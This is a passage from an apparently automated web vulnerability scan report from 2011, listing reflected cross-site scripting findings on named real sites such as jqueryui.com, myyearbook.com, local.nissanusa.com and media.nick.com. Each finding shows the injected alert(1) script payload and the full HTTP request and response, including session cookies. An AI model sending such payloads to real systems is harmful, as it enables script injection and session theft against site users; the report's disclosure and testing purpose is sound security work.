Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300549516_20053:11792:7:0_20056:11790:2:1003244_14598:11789:1:1180912; uid=1_1300549516_1297862321306:0415785655118336; kwd=1_1300549516_11317:138330_11717:138330_11718:138330_11719:138330_11722:246965_10827:246965_10842:246969_10839:246969_10824:247169; scg=1_1300549516; ppd=1_1300549516

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:02:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300626148_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 13:02:28 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 13:02:28 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 652

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=6436&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%25
...[SNIP]...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C&dcb9e"-alert(1)-"9d8e5c695bf=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

1.100. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e5c"-alert(1)-"95a1f6c3da4 was submitted in the tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=643668e5c"-alert(1)-"95a1f6c3da4&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?cLl-ABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAEjY8vVKW5z8NAiuHFtnwP7-fGi.dJPI.7FG4HoXr-T8.CtejcD3-P5qZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvvAOl.djOCUuT1BsThjs22HOeFbFpkZ8FEdeFAAAAAA==,,http%3A%2F%2Ftherugged.com%2F,Z%3D728x90%26s%3D1602587%26_salt%3D4236502337%26B%3D10%26u%3Dhttp%253A%252F%252Ftherugged.com%252F%26r%3D0,7e2442f2-52ee-11e0-b330-003048d56aa4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300549516_20053:11792:7:0_20056:11790:2:1003244_14598:11789:1:1180912; uid=1_1300549516_1297862321306:0415785655118336; kwd=1_1300549516_11317:138330_11717:138330_11718:138330_11719:138330_11722:246965_10827:246965_10842:246969_10839:246969_10824:247169; scg=1_1300549516; ppd=1_1300549516

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:01:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1300626093_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 13:01:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 13:01:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 649

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=643668e5c"-alert(1)-"95a1f6c3da4&type=lead&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeH
...[SNIP]...

1.101. http://imp.fetchback.com/serve/fb/adtag.js [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a22a"-alert(1)-"5ba6e5a8cf4 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/fb/adtag.js?tid=6436&type=lead8a22a"-alert(1)-"5ba6e5a8cf4&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcw9D0y4BAAAAAAAAADdlMjQ0MmYyLTUyZWUtMTFlMC1iMzMwLTAwMzA0OGQ1NmFhNAA4nyoAAAA%3D%2C%2Chttp%253A%252F%252Ftherugged%2Ecom%252F%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?cLl-ABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXkMAAAAAAAACA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAEjY8vVKW5z8NAiuHFtnwP7-fGi.dJPI.7FG4HoXr-T8.CtejcD3-P5qZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvvAOl.djOCUuT1BsThjs22HOeFbFpkZ8FEdeFAAAAAA==,,http%3A%2F%2Ftherugged.com%2F,Z%3D728x90%26s%3D1602587%26_salt%3D4236502337%26B%3D10%26u%3Dhttp%253A%252F%252Ftherugged.com%252F%26r%3D0,7e2442f2-52ee-11e0-b330-003048d56aa4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300549516_20053:11792:7:0_20056:11790:2:1003244_14598:11789:1:1180912; uid=1_1300549516_1297862321306:0415785655118336; kwd=1_1300549516_11317:138330_11717:138330_11718:138330_11719:138330_11722:246965_10827:246965_10842:246969_10839:246969_10824:247169; scg=1_1300549516; ppd=1_1300549516

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1300626099_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Fri, 18-Mar-2016 13:01:39 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 20 Mar 2011 13:01:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 649

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=6436&type=lead8a22a"-alert(1)-"5ba6e5a8cf4&clicktrack=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253Bde8e87e7c08dcb01%253B12ed3430f73%2C0%253B%253B%253B3505910700%2CcLl%2DABt0GABXJh8AAAAAAArUCQAAAAAAAAAAAAYAAAAAAA0AAQABCHmeHQAAAAAAtXk
...[SNIP]...

1.102. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0236"><script>alert(1)</script>7f62d8be2ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?a0236"><script>alert(1)</script>7f62d8be2ee=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 20 Mar 2011 14:02:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&a0236"><script>alert(1)</script>7f62d8be2ee=1" type="text/css" media="all" />
...[SNIP]...

1.103. http://k.collective-media.net/cmadj/cm.mtv/games_010111 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/games_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e71'-alert(1)-'f2127ac1c8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.mtvf6e71'-alert(1)-'f2127ac1c8e/games_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=595575;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 20 Mar 2011 12:34:57 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 21-Mar-2011 12:34:57 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Mon, 21-Mar-2011 12:34:57 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 27-Mar-2011 12:34:57 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 20-Mar-2011 20:34:57 GMT
Content-Length: 9354

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-12458693_1300624497","http://ib.adnxs.com/ptj?member=311&inv_code=cm.mtvf6e71'-alert(1)-'f2127ac1c8e&size=728x90&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.mtvf6e71%27-alert%281%29-%27f2127ac1c8e%2Fgames_010111%3Bnet%3Dcm%3Bu%3D%2Ccm-12458693_1300624497%2C11e4f07c0988ac7%2Cnone%2Cax.{
...[SNIP]...

1.104. http://live.myyearbook.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://live.myyearbook.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e77d"><script>alert(1)</script>adfd64910ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2e77d"><script>alert(1)</script>adfd64910ba=1 HTTP/1.1
Host: live.myyearbook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:02:33 GMT
Server: Apache
Set-Cookie: PHPSESSID=2d39b18921b58d4d3bb8eab5a3c5c25e; path=/; domain=.myyearbook.com
Set-Cookie: mybRegTheme=Live; expires=Sun, 27-Mar-2011 14:02:33 GMT; path=/; domain=.myyearbook.com
Set-Cookie: mybRegData=%5B%5D; expires=Sun, 27-Mar-2011 14:02:33 GMT; path=/; domain=.myyearbook.com
Set-Cookie: POSTAff2Cookie=Live; expires=Mon, 19-Mar-2012 14:02:33 GMT; path=/; domain=.myyearbook.com
Set-Cookie: nid=deleted; expires=Sat, 20-Mar-2010 14:02:32 GMT; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Sat, 20-Mar-2010 14:02:32 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Sat, 20-Mar-2010 14:02:32 GMT; path=/; domain=.myyearbook.com
Set-Cookie: MYB_TARGET=_unknown_1000_____; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 15964
Connection: close
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="UTF-8" xml:
...[SNIP]...
<iframe id="canvas" class="noHide" frameBorder="0" name="canvas" src="http://canvas.myyearbook.com/canvas?2e77d"><script>alert(1)</script>adfd64910ba=1">
...[SNIP]...

1.105. http://local.nissanusa.com/zip.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31885"><script>alert(1)</script>8d5615532b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /zip.aspx?31885"><script>alert(1)</script>8d5615532b8=1 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:02:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:02:33 GMT
Content-Length: 17221
Connection: close
Set-Cookie: PHPSESSID=2unope6bsn2o0bs57l72i93o63; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href="http://local.nissanusa.com/espanol/?31885"><script>alert(1)</script>8d5615532b8=1">
...[SNIP]...

1.106. http://mbox12e.offermatica.com/m2/tmobile/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox12e.offermatica.com
Path:	/m2/tmobile/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8e365<script>alert(1)</script>7c131dff6d4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/tmobile/mbox/standard?mboxHost=www.t-mobile.com&mboxSession=1300624507874-511379&mboxPage=1300624507874-511379&mboxCount=1&mbox=tmobile_global8e365<script>alert(1)</script>7c131dff6d4&mboxId=0&mboxURL=http%3A%2F%2Fwww.t-mobile.com%2F&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.t-mobile.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 210
Date: Sun, 20 Mar 2011 13:02:42 GMT
Server: Test & Target

mboxFactories.get('default').get('tmobile_global8e365<script>alert(1)</script>7c131dff6d4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1300624507874-511379.17");

1.107. http://media.nick.com/player/config.jhtml [feedHub parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the feedHub request parameter is copied into the HTML document as plain text between tags. The payload e2938<a>eed451bea22 was submitted in the feedHub parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kids&type=network&site=nick&playerName=teennickCoverFlowPlayer&feedHub=showse2938<a>eed451bea22 HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 5287
Content-Type: text/xml
Set-Cookie: app-instance=nick-com-1-kids-jboss-135; Path=/
Set-Cookie: JSESSIONID=E8E236ABF1378F88F157FBAD09034F08.kids-jboss-135-811-mtvi-com-28851; Path=/
ETag: c42fcd5863c75db1794bda53668eb5
Pragma: no-cache
MTVi-Edge-control: bust-downstream
Cache-Control: max-age=1800
Expires: Sun, 20 Mar 2011 14:36:11 GMT
Date: Sun, 20 Mar 2011 14:06:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>

<configuration>


<gui url="http://media.nick.com/player/gui/?v=1.5.5" formFactor="ff1" height="31" width="100%" includeInLayo
...[SNIP]...

...[SNIP]...

1.108. http://media.nick.com/player/config.jhtml [group parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the group request parameter is copied into the HTML document as plain text between tags. The payload e5d0e<a>45a3e5c62a6 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kidse5d0e<a>45a3e5c62a6&type=network&site=nick&playerName=teennickCoverFlowPlayer&feedHub=shows HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 5262
Content-Type: text/xml
Set-Cookie: app-instance=nick-com-1-kids-jboss-019; Path=/
Set-Cookie: JSESSIONID=94072E50844A4D31C204EF7615076955.kids-jboss-019-811-mtvi-com-28851; Path=/
ETag: c42fcd5863c75db1794bda53668eb5
Pragma: no-cache
MTVi-Edge-control: bust-downstream
Cache-Control: max-age=1800
Expires: Sun, 20 Mar 2011 14:36:02 GMT
Date: Sun, 20 Mar 2011 14:06:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>

<configuration>


<gui url="http://media.nick.com/player/gui/?v=1.5.5" formFactor="ff1" height="31" width="100%" includeInLayo
...[SNIP]...

...[SNIP]...

1.109. http://media.nick.com/player/config.jhtml [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e59e9<a>24ec399ad07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kids&type=network&site=nick&playerName=teennickCoverFlowPlayer&feedHub=shows&e59e9<a>24ec399ad07=1 HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 5265
Content-Type: text/xml
Set-Cookie: app-instance=nick-com-1-kids-jboss-133; Path=/
Set-Cookie: JSESSIONID=1A76B963D5A79DE7916791B23A1824AA.kids-jboss-133-811-mtvi-com-28851; Path=/
ETag: c42fcd5863c75db1794bda53668eb5
Pragma: no-cache
MTVi-Edge-control: bust-downstream
Cache-Control: max-age=1800
Expires: Sun, 20 Mar 2011 14:36:12 GMT
Date: Sun, 20 Mar 2011 14:06:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>

<configuration>


<gui url="http://media.nick.com/player/gui/?v=1.5.5" formFactor="ff1" height="31" width="100%" includeInLayo
...[SNIP]...

...[SNIP]...

1.110. http://media.nick.com/player/config.jhtml [playerName parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the playerName request parameter is copied into the HTML document as plain text between tags. The payload ec1db<a>940f728b942 was submitted in the playerName parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kids&type=network&site=nick&playerName=teennickCoverFlowPlayerec1db<a>940f728b942&feedHub=shows HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 8159
Content-Type: text/xml
Set-Cookie: app-instance=nick-com-1-kids-jboss-130; Path=/
Set-Cookie: JSESSIONID=7B6A9D3C94D746094CA6700F99268C20.kids-jboss-130-811-mtvi-com-28851; Path=/
ETag: c42fcd5863c75db1794bda53668eb5
Pragma: no-cache
MTVi-Edge-control: bust-downstream
Cache-Control: max-age=1800
Expires: Sun, 20 Mar 2011 14:36:09 GMT
Date: Sun, 20 Mar 2011 14:06:09 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>

<configuration>


